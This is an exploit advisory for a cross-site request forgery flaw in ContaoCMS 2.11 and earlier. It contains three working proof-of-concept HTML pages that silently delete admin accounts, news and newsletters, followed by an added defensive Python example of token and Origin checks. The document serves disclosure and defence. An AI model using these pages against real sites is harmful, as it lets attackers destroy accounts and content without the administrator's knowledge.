ContaoCMS 2.11.0 Cross Site Request Forgery

2012-02-27 / 2012-03-21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date : 25-02-2012
# Author : Ivano Binetti (
# Software link :
# Vendor site :
# Version : 2.11.0 (latest) and lower
# Tested on : Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+

Summary
1) Introduction
2) Vulnerabilities Description
   2.1 Delete Administrators or Users
   2.2 Delete News
   2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+

1) Introduction

Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain".

2) Vulnerabilities Description

Contao 2.11 (and lower) is affected by a CSRF vulnerability which allows an attacker to delete admins/users and to delete web content (articles, news, newsletters and so on). Each proof of concept below is a page that auto-submits a POST form to a state-changing back-end URL when a logged-in Contao administrator loads it; no anti-CSRF token is required by the targeted action.

2.1 Delete Administrators or Users

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete ADMIN/USER account</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
</form>
</body>
</html>

Note that it is possible to delete any admin/user, including the first administrator (id=1) created during Contao's installation phase.

2.2 Delete News

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete News</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
</form>
</body>
</html>

2.3 Delete Newsletter

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete Newsletter</H2>
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+
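The following Python sketch is an added defensive example; it is not part of the advisory and is not Contao's own code. It shows the server-side check (CWE-352 mitigation) that stops exactly the kind of auto-submitted cross-site form above: a per-session synchronizer token that the form must echo back, plus an Origin/Referer comparison against the site's own origin. The request and session shapes (plain dicts), the form field name `csrf_token`, and the hosts `contao.example` and `attacker.example` are assumptions constructed for the example.

```python
"""
Server-side CSRF defence for state-changing back-end actions, illustrated on
the ?act=delete requests from the advisory. Added example code, not Contao's
implementation. Assumed shapes: a dict stands in for the HTTP request
(method, url, form, headers) and a dict for the server-side session.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Query-string actions that change data and therefore need CSRF protection.
STATE_CHANGING_ACTS = {"delete"}
# Constructed placeholder for the site's own origin (not a real host).
TRUSTED_ORIGIN = "http://contao.example"


def issue_token(session: dict) -> str:
    """Create, once per session, a random secret and keep it server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def is_state_changing(url: str) -> bool:
    """True when the URL carries an act= value that modifies data."""
    query = parse_qs(urlsplit(url).query)
    return any(act in STATE_CHANGING_ACTS for act in query.get("act", []))


def check_request(request: dict, session: dict) -> tuple:
    """
    Decide whether a request may perform a state-changing action.
    Returns (allowed, reason). Read-only requests are always allowed here;
    everything else must be a same-origin POST carrying the session token.
    """
    if not is_state_changing(request["url"]):
        return True, "not a state-changing action"
    if request["method"].upper() != "POST":
        return False, "state change must use POST"

    # Origin/Referer check: a form auto-submitted from another site announces
    # that site's origin, which cannot match ours. Older clients may send
    # neither header, so this alone is not sufficient and we fall through.
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    source = headers.get("origin") or headers.get("referer")
    if source:
        src, own = urlsplit(source), urlsplit(TRUSTED_ORIGIN)
        if (src.scheme, src.netloc) != (own.scheme, own.netloc):
            return False, f"cross-site source {src.scheme}://{src.netloc}"

    # Synchronizer token: the attacker's page cannot read our session secret,
    # so a form it builds cannot include it. Constant-time comparison.
    expected = session.get("csrf_token")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not supplied:
        return False, "missing request token"
    if not hmac.compare_digest(expected, supplied):
        return False, "request token mismatch"
    return True, "valid request token"


if __name__ == "__main__":
    session = {}
    token = issue_token(session)
    delete_url = "http://contao.example/contao/main.php?do=user&act=delete&id=2"
    # Constructed request as the advisory's PoC page would produce it.
    poc = {"method": "POST", "url": delete_url, "form": {},
           "headers": {"Origin": "http://attacker.example"}}
    # Constructed request as the site's own back-end form would produce it.
    legit = {"method": "POST", "url": delete_url, "form": {"csrf_token": token},
             "headers": {"Origin": TRUSTED_ORIGIN}}
    print("PoC:  ", check_request(poc, session))
    print("legit:", check_request(legit, session))
```

The order of the checks matters for what gets logged: rejecting on Origin first gives a clear cross-site signal in the audit trail, while the token check catches clients that omit both headers. Actions should still be rejected on GET so that a simple image tag or link cannot trigger them.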


